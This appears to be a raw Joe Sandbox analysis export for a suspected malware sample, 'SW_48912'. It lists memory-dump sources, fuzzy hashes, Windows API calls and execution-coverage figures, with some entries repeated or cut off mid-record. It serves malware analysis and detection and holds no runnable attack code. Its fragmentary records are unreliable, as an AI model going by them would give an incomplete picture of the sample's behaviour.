                                                                                                                      • Instruction ID: fd66133575046f9e1805ece3927eacf4b6b0ce650f5fb4d69e7f7d25aa6d84d7
                                                                                                                      • Opcode Fuzzy Hash: b371a20b2c01a024ce20e6ead6d97c98bab69ad81c79e62153a5fd97f982b6d8
                                                                                                                      • Instruction Fuzzy Hash: 4A1115B18003488FDB50EF9AC449B9EFFF4EB48724F208459D559A7211C375A944CFA5
                                                                                                                      APIs
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 06F83495
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Initialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2538663250-0
                                                                                                                      • Opcode ID: 9d4c23dbfbd4b594e8a147b2513744d27d6a534d58f3723ed4c4b2e0ae2de08c
                                                                                                                      • Instruction ID: 5ceaf093ef0bb531c4e7170b638dd06d1cdc5b4f250493e12ba22ac2c37d22b3
                                                                                                                      • Opcode Fuzzy Hash: 9d4c23dbfbd4b594e8a147b2513744d27d6a534d58f3723ed4c4b2e0ae2de08c
                                                                                                                      • Instruction Fuzzy Hash: 4B1112B6C003488FCB10EF99D989BDEBFF8AB48320F20845AD519A3611C379A544CFA1
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 06F841BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 410705778-0
                                                                                                                      • Opcode ID: d7ac956ee33cce621376c6c00ac34b41f0cef234323462332853f35addfa6fc1
                                                                                                                      • Instruction ID: 738bcc8430e87f5d33b8d10e0cd961f710fe6386bac576579f3d926ecd7b7a19
                                                                                                                      • Opcode Fuzzy Hash: d7ac956ee33cce621376c6c00ac34b41f0cef234323462332853f35addfa6fc1
                                                                                                                      • Instruction Fuzzy Hash: 8D1112B58003499FDB10DF9AC889BDFFBF8EB48320F10845AE918A3210C375A954CFA1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %*&/)(#$^@!~-_
                                                                                                                      • API String ID: 0-3325533558
                                                                                                                      • Opcode ID: f954ee762dfea486bee2611838d9f7e690893f75db315767c421cb9fcdd60805
                                                                                                                      • Instruction ID: 0905a92170e6ca335f9b2d773b95ee9df60f07156ea4e2f88850dfb76dd7952f
                                                                                                                      • Opcode Fuzzy Hash: f954ee762dfea486bee2611838d9f7e690893f75db315767c421cb9fcdd60805
                                                                                                                      • Instruction Fuzzy Hash: 7B51E271B002149FD710BBB8D444BAE7BB2FF88300F0488A9D9955B399CF756D48C781
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %*&/)(#$^@!~-_
                                                                                                                      • API String ID: 0-3325533558
                                                                                                                      • Opcode ID: df41105bd9f4746aa4dbf6c752285876ebeb60845468db3e194a6c5162d3ba81
                                                                                                                      • Instruction ID: a0aa323c3b02b9f815449e3b31a0da733136d6f8df549814d4ffed4e06d6add1
                                                                                                                      • Opcode Fuzzy Hash: df41105bd9f4746aa4dbf6c752285876ebeb60845468db3e194a6c5162d3ba81
                                                                                                                      • Instruction Fuzzy Hash: BE51D171B00254AFD710BBA4D445BAEBBB2FF88300F0488A9D9955B399CF756E49C781
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Tedq
                                                                                                                      • API String ID: 0-228892971
                                                                                                                      • Opcode ID: 771f31caa3d739161171b796d7616591aac592d63b0c5e18f47e08d7053dbfe1
                                                                                                                      • Instruction ID: 976fad895b1e05c11c1709d5008f92dbfa5242becd6d076bb218a812b64edbc5
                                                                                                                      • Opcode Fuzzy Hash: 771f31caa3d739161171b796d7616591aac592d63b0c5e18f47e08d7053dbfe1
                                                                                                                      • Instruction Fuzzy Hash: 2F31DFB4E04218CFDB44DFA9C4809EDFBB6AF4D310F10916AE919A7261D735A941CF90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Tedq
                                                                                                                      • API String ID: 0-228892971
                                                                                                                      • Opcode ID: 60c8f538c400143add9a9505e2daa8747e14a0104b2425effa3920566ff5d8a0
                                                                                                                      • Instruction ID: 8e65c9d69dc2dc7ed5182db1fce0d902901296a504ee4f478705a3acf8f8d065
                                                                                                                      • Opcode Fuzzy Hash: 60c8f538c400143add9a9505e2daa8747e14a0104b2425effa3920566ff5d8a0
                                                                                                                      • Instruction Fuzzy Hash: A231E3B4E05218DFDB44EFA9C484AADFBB6FF49300F10906AE909AB255C7319945CF90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Tedq
                                                                                                                      • API String ID: 0-228892971
                                                                                                                      • Opcode ID: 564968f7d8271a5ec4c9d948a4c1827590098df5b5f9841ae11ad522663dea4d
                                                                                                                      • Instruction ID: b131eb7aff5da8ad921395c2bc751e905fa3be18d175df85a35b048d49c5c909
                                                                                                                      • Opcode Fuzzy Hash: 564968f7d8271a5ec4c9d948a4c1827590098df5b5f9841ae11ad522663dea4d
                                                                                                                      • Instruction Fuzzy Hash: 042106B1D046088BDB58DFEAC9556DEFBF6AF89300F14C02AD415AB358EB741946CB90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Tedq
                                                                                                                      • API String ID: 0-228892971
                                                                                                                      • Opcode ID: 1474ca65842c7571f0e36c9ac83a5fdd4a947196deb6399e5c99230c4a4f93bf
                                                                                                                      • Instruction ID: c694600eaf4b46f793fc459dee6d0a8ab734c14c4ad62511bffc5355d2e8d3fe
                                                                                                                      • Opcode Fuzzy Hash: 1474ca65842c7571f0e36c9ac83a5fdd4a947196deb6399e5c99230c4a4f93bf
                                                                                                                      • Instruction Fuzzy Hash: ED11C3B0E046488BDB58DFEAC5546EEFFF6AF89300F14C06AC415AB358DB741946CB90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Tedq
                                                                                                                      • API String ID: 0-228892971
                                                                                                                      • Opcode ID: f6bf28ae6425aa02bfafbfc6e207df98b1e7150cc15dda89d8558528ae9ab747
                                                                                                                      • Instruction ID: a25ffee5cbd4dfe7201b682cf037b77f566e6d8c8b81bcfc602c0d8d15c7fe19
                                                                                                                      • Opcode Fuzzy Hash: f6bf28ae6425aa02bfafbfc6e207df98b1e7150cc15dda89d8558528ae9ab747
                                                                                                                      • Instruction Fuzzy Hash: 38119079E002499FCF08CFE8C4949ADFBB2FF48310F10816AE919AB265D7316945CF80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 762a1cfbe4ab807603356a97e72d64f280e5788e262af58f3e9da043a02a3b1e
                                                                                                                      • Instruction ID: 43d8fe1fb7ea59c997010244cab0d8c79e3ca87da524faf969a854fea6b10e82
                                                                                                                      • Opcode Fuzzy Hash: 762a1cfbe4ab807603356a97e72d64f280e5788e262af58f3e9da043a02a3b1e
                                                                                                                      • Instruction Fuzzy Hash: 98A1C375910619CFDB50EF68C840A98FBB1FF49304F05C699E949BB315EB30AA89CF90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 66ab7ec498ffea7dd7f6e74f9c5afe8c918865718a52732cd41e62f14924e7e6
                                                                                                                      • Instruction ID: bb26eb965acd761f0d19a1e0af2e29245790b49b3e5470262b78e00dbc494b91
                                                                                                                      • Opcode Fuzzy Hash: 66ab7ec498ffea7dd7f6e74f9c5afe8c918865718a52732cd41e62f14924e7e6
                                                                                                                      • Instruction Fuzzy Hash: CF5103F5F14215DFE790AB29C841BBEB7A2EF85315F3480B6E4159B291DE34C841C7A2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 092109d6bd3fc79f812b2a8a4ae65ce170500a216cd96ac6f5e04b27aec47920
                                                                                                                      • Instruction ID: 4fdc8486c6aa4ee89f1846fabdfaf490d0214bbf46d2f8d0e01b2782e8a2c408
                                                                                                                      • Opcode Fuzzy Hash: 092109d6bd3fc79f812b2a8a4ae65ce170500a216cd96ac6f5e04b27aec47920
                                                                                                                      • Instruction Fuzzy Hash: DA51B7F4E012189FEB40AFA9D9517BEBBB2BF44700F108066E951AB3C9E7349D41CB91
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 08870a4c3ed57b4779e55346390aca688904d550e0df00237c01f4a96aa8d10a
                                                                                                                      • Instruction ID: 901648e59ac65ddc31a9aaf220b1c6fc933f2b11e4bfafca2d74058d61780810
                                                                                                                      • Opcode Fuzzy Hash: 08870a4c3ed57b4779e55346390aca688904d550e0df00237c01f4a96aa8d10a
                                                                                                                      • Instruction Fuzzy Hash: 6B11A0B0F50201DFE7A4AA16C845B6E73A2EB85716FB580F6E5169B2A1CE70D840C7E1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5b292e5ce37b1c9da9aea16db92c4ef80861e94c470f284c947debadc98ce6f8
                                                                                                                      • Instruction ID: af778223abd20c626f61a9157aa4e1098190427698e02caf0f78673193cd3fe6
                                                                                                                      • Opcode Fuzzy Hash: 5b292e5ce37b1c9da9aea16db92c4ef80861e94c470f284c947debadc98ce6f8
                                                                                                                      • Instruction Fuzzy Hash: 162103B68043499FDB60DF9AC884ADEBFF4FB48320F108459E919A7211C374A954CFA1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1919526230.00000000022FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022FD000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_22fd000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                      • Instruction ID: d69b4787381f6caf026bd97f2b858cb9dfcf87a637bee9d08eb494770716f88d
                                                                                                                      • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                      • Instruction Fuzzy Hash: 1B110376504280CFCB12CF50D5C4B16FF72FB84328F24C6A9D9090B25AC336D45ACBA2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1919526230.00000000022FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022FD000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_22fd000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                      • Instruction ID: 9ffb555614e8f06ad8238a5e41c36597eba8e05569d62017280bf426baf68ffe
                                                                                                                      • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                      • Instruction Fuzzy Hash: 89112276504281CFCB06CF40D9C4B16FF72FB84324F24C2A9D9090B65AC33AE45ACBA2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1919699013.000000000230D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0230D000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_230d000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                      • Instruction ID: 4a079762c6ab625067f10a5dda3067eefe4a66e82b44ed02641adab4069066f0
                                                                                                                      • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                      • Instruction Fuzzy Hash: 8311DD75904284DFCB02CF54C5D4B15FBB2FB88324F24C6ADD8494B696C33AD40ACB61
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: db187a4570dabbda466d6fb619cbb2f5f2b6d699948c8e8d6276660adaa26143
                                                                                                                      • Instruction ID: 4143909a76bab4319b79cffe86e6b2479e16e8e4f23ee3cba0005a588e4c466b
                                                                                                                      • Opcode Fuzzy Hash: db187a4570dabbda466d6fb619cbb2f5f2b6d699948c8e8d6276660adaa26143
                                                                                                                      • Instruction Fuzzy Hash: 4D01F7FA9093E24FEB5357B954A22947FF0EB6315678801DBC996CB097E208840FD772
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3cc8556be0478894e1010f2ce404c824e83c0abbfca35028c0159b662dbb07fe
                                                                                                                      • Instruction ID: 9f8aec67bca0951dd58450d4115333c6a7e5eca766cd13393a618d299263eb48
                                                                                                                      • Opcode Fuzzy Hash: 3cc8556be0478894e1010f2ce404c824e83c0abbfca35028c0159b662dbb07fe
                                                                                                                      • Instruction Fuzzy Hash: ED0124716012189FC350AB68D8086A67BE5EB15308B28C0F6E91CCF112EA76C846C792
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1919526230.00000000022FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022FD000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_22fd000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 68b60b9387f410ddf725da325799da9a4f13b79cccd1ce6c56de629545c5d231
                                                                                                                      • Instruction ID: 266142462035cfd30048e47eb359e48698bbae188384095b70104926c871c1dd
                                                                                                                      • Opcode Fuzzy Hash: 68b60b9387f410ddf725da325799da9a4f13b79cccd1ce6c56de629545c5d231
                                                                                                                      • Instruction Fuzzy Hash: 2F01F7710183449AE7509A95CDC4BA6FFD8DF51325F18C52AEE090E28AC7799841CA71
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8a46239648269f31693a4a13eba19a3fb3a023aa40193921e5cbf401aae9b7c4
                                                                                                                      • Instruction ID: de6b81692828de623053c814fe46f9cd99f8eff4e97562a6e4d00283aeb20205
                                                                                                                      • Opcode Fuzzy Hash: 8a46239648269f31693a4a13eba19a3fb3a023aa40193921e5cbf401aae9b7c4
                                                                                                                      • Instruction Fuzzy Hash: E301ACB4A15108DFD744EFA8C684AADBBF6EB4D301F15D4D4950997365D7309E00DB40
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2de65f53c3f715ee51232782d223243ca31ba9a1a49d51df6d0256c04d2c7c1f
                                                                                                                      • Instruction ID: 9f188b9b9af266067cb0f097d95deb6deaad40a1979821da11d1b3410b3219d6
                                                                                                                      • Opcode Fuzzy Hash: 2de65f53c3f715ee51232782d223243ca31ba9a1a49d51df6d0256c04d2c7c1f
                                                                                                                      • Instruction Fuzzy Hash: FAF08972604204BFEF45DB74DC81DDE7FB9EF45164B1480A6E409EB225E631DD01C7A0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1919526230.00000000022FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022FD000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_22fd000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e7b286e357a2e3f3ed06e0d85d19ab10e1f9473ea55c162e310ec375bc59c751
                                                                                                                      • Instruction ID: 4ba682c349f983cf3ffcf0a6b4034a8b72f5378ba62f83e14eac88806c8eb0cd
                                                                                                                      • Opcode Fuzzy Hash: e7b286e357a2e3f3ed06e0d85d19ab10e1f9473ea55c162e310ec375bc59c751
                                                                                                                      • Instruction Fuzzy Hash: 3FF062724043449AE7509E56CD88B62FFD8EB51734F18C45AEE094E29AC3799845CAB1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 488e1cd59ed300a4af0f68aa4919b32d212e96258059ff230aa99b858148eeb0
                                                                                                                      • Instruction ID: ef89ca208fae14b1880c9a4397143f4a464ba962106ccfa2ab040ca8445c0d68
                                                                                                                      • Opcode Fuzzy Hash: 488e1cd59ed300a4af0f68aa4919b32d212e96258059ff230aa99b858148eeb0
                                                                                                                      • Instruction Fuzzy Hash: BFF0F9B0E0030ADFEB48EFA9C855AAEBBF5EB48244F1085A9A515E7350DB70D900CFD0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7a5305f86e53e0d1f5b99a36e8cbde8e44a3b991ec75a9638355d323bcfa7b82
                                                                                                                      • Instruction ID: 4f4ce09fa6627aa71ec0b6c9264c5eda534fa2bd7e1bec0fcbed960f292cb222
                                                                                                                      • Opcode Fuzzy Hash: 7a5305f86e53e0d1f5b99a36e8cbde8e44a3b991ec75a9638355d323bcfa7b82
                                                                                                                      • Instruction Fuzzy Hash: 48F0B7B0D0430A9FDB44EFA9C841AAEBBF4EB48204F1085A9D918E7340DB749600CF90
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 447ac3375b5b4156d849fddbf0a2e98091cb3489a16315b95be931759fae1129
                                                                                                                      • Instruction ID: d70c4df30d70921da39c39c9accf6488fa998a317294932c4d8812ae4a761c07
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 585607a3bbe3e2fc8b8a7448b40ee1ac455d1d01049a777f0d8555a47c2a3b41
                                                                                                                      • Instruction ID: 7a362181db0e3d9d8dceb9b8ec16ccfed0990e8ef12232170c745f83fdc879b8
                                                                                                                      • Opcode Fuzzy Hash: 585607a3bbe3e2fc8b8a7448b40ee1ac455d1d01049a777f0d8555a47c2a3b41
                                                                                                                      • Instruction Fuzzy Hash: 7231CAB1D056189FEB98DF6AC8407AEBBF7BF89300F04C0AAD509A7255DB340985CF51

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:1.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:5.2%
                                                                                                                      Signature Coverage:8.1%
                                                                                                                      Total number of Nodes:135
                                                                                                                      Total number of Limit Nodes:8

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417725
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Load
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2234796835-0
                                                                                                                      • Opcode ID: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                                                      • Instruction ID: b88247e3bf074f405839055fc92c8dfc4e22cdda4e1e567452dbb1709a050ac5
                                                                                                                      • Opcode Fuzzy Hash: 54d6f386663d5f6ad0a9369f0d80f04f2da9edb397004349e0dbd63b4fb0560c
                                                                                                                      • Instruction Fuzzy Hash: B60125B5E0020DABDF10DBE5DC42FDEB7789B54308F4041A6E91897280FA75EB58CB95

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 400 42c533-42c56c call 4047d3 call 42d793 NtClose
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C567
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_400000_SW_48912.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 4fd420b1cf45f968bd5c101bb5892aae1e7638fed89652d678df022ed48024bd
                                                                                                                      • Instruction ID: 8d926487dfcd4b78fc97b4d09a9081267ac143cf4d7600c1d6712fb6aa153d77
                                                                                                                      • Opcode Fuzzy Hash: 4fd420b1cf45f968bd5c101bb5892aae1e7638fed89652d678df022ed48024bd
                                                                                                                      • Instruction Fuzzy Hash: E8E046762003147BD620AA6ADC45FEB776DDBCA724F01442AFA08A7641C6B4B91186F9

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 414 1422b60-1422b6c LdrInitializeThunk
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 6bcd4f83b35e9215b5805ec580c2bef7149d1647b22f139d684cd714fc8af498
                                                                                                                      • Instruction ID: 380677072ded86e938762bdc90c522b65d5e03485e6c873502698c72ce6e7809
                                                                                                                      • Opcode Fuzzy Hash: 6bcd4f83b35e9215b5805ec580c2bef7149d1647b22f139d684cd714fc8af498
                                                                                                                      • Instruction Fuzzy Hash: 3890026120240103410571584414616801A97F4201B55C122F1018591DC63589927225
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
